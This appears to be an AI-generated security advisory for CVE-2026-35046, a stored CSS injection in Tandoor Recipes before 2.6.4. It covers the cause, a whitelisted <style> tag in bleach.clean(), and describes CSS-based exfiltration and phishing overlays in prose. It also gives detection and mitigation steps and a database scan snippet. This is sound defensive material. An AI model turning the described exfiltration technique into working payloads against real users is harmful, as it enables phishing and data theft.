CVE-2026-35046 Overview
CVE-2026-35046 is a CSS Injection vulnerability affecting Tandoor Recipes, an application for managing recipes, planning meals, and building shopping lists. Prior to version 2.6.4, Tandoor Recipes allows authenticated users to inject arbitrary <style> tags into recipe step instructions. The bleach.clean() sanitizer explicitly whitelists the <style> tag, causing the backend to persist and serve unsanitized CSS payloads via the API.
Any client consuming instructions_markdown from the API and rendering it as HTML without additional sanitization will execute attacker-controlled CSS — enabling UI redressing, phishing overlays, visual defacement, and CSS-based data exfiltration.
Critical Impact
Authenticated attackers can inject malicious CSS payloads that persist in the application database and execute in victims' browsers, potentially enabling phishing attacks, UI manipulation, and sensitive data exfiltration through CSS-based techniques.
Affected Products
- Tandoor Recipes versions prior to 2.6.4
Discovery Timeline
- 2026-04-06 - CVE CVE-2026-35046 published to NVD
- 2026-04-07 - Last updated in NVD database
Technical Details for CVE-2026-35046
Vulnerability Analysis
This vulnerability (CWE-79: Cross-Site Scripting) stems from an improper input sanitization issue in Tandoor Recipes' handling of recipe step instructions. The application uses the Python bleach library to sanitize user-supplied HTML content; however, the configuration explicitly whitelists the <style> tag, creating a security gap that allows CSS injection attacks.
When authenticated users submit recipe content containing <style> tags, the backend persists these payloads without proper sanitization. The malicious CSS is then served through the instructions_markdown API endpoint to any client rendering the recipe content.
CSS injection, while not as immediately dangerous as JavaScript-based XSS, presents significant security risks. Attackers can leverage CSS to manipulate the visual presentation of the application, create convincing phishing overlays, exfiltrate data through CSS selectors and background image requests, and perform keystroke logging through creative CSS attribute selectors.
Root Cause
The root cause of this vulnerability is the explicit whitelisting of the <style> tag in the bleach.clean() sanitizer configuration. While the sanitizer is designed to strip potentially dangerous HTML elements, the misconfiguration allows style elements to pass through unfiltered. This design flaw enables authenticated users to inject arbitrary CSS that persists in the database and executes when other users view the affected recipe content.
Attack Vector
The attack requires network access and authenticated user privileges. An attacker with a valid account can craft recipe step instructions containing malicious <style> tags. When another user views the recipe, the injected CSS executes in their browser context.
The exploitation flow involves submitting a recipe with embedded CSS in the step instructions, the backend storing the payload without sanitization, the API serving the malicious content via instructions_markdown, and victim browsers rendering the attacker-controlled CSS when viewing the recipe.
Since CSS can reference external URLs through properties like background-image, attackers can exfiltrate data by encoding sensitive information in request parameters to attacker-controlled servers.
Detection Methods for CVE-2026-35046
Indicators of Compromise
- Presence of <style> tags within recipe step instructions or instructions_markdown fields in the database
- Unusual CSS content referencing external domains in recipe data
- API responses containing embedded style blocks with suspicious selectors or properties
- User reports of unexpected visual changes or overlay elements when viewing recipes
Detection Strategies
- Implement content security policies (CSP) to detect and block unauthorized style injections
- Monitor database records for <style> tag patterns in user-generated content fields
- Review application logs for recipe submissions containing HTML style elements
- Deploy web application firewalls (WAF) with rules to detect CSS injection patterns
Monitoring Recommendations
- Enable logging of all recipe creation and modification events with content inspection
- Set up alerts for API responses containing inline style blocks
- Monitor for external resource requests originating from CSS in user content
- Implement periodic database scans to identify existing malicious payloads
How to Mitigate CVE-2026-35046
Immediate Actions Required
- Upgrade Tandoor Recipes to version 2.6.4 or later immediately
- Audit existing recipe database entries for injected <style> tags and sanitize affected records
- Review application access logs to identify potential exploitation attempts
- Implement Content Security Policy headers to restrict inline styles
Patch Information
The vulnerability has been fixed in Tandoor Recipes version 2.6.4. The patch removes <style> from the bleach.clean() whitelist, ensuring that style tags are properly sanitized from user input. Detailed information about the fix is available in the GitHub Release 2.6.4 and the GitHub Security Advisory GHSA-9hhh-g2fc-r8x2.
Workarounds
- If immediate upgrade is not possible, implement server-side middleware to strip <style> tags from recipe content before serving
- Configure a reverse proxy or WAF to filter style elements from API responses
- Implement client-side sanitization using libraries like DOMPurify when rendering instructions_markdown content
- Restrict recipe creation privileges to trusted users until the patch can be applied
# Database cleanup example - identify potentially malicious entries
# Run against your Tandoor Recipes database to find injected style tags
grep -r "<style" /path/to/recipes/data/
# Or via database query:
# SELECT id, instructions_markdown FROM recipes WHERE instructions_markdown LIKE '%<style%';
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
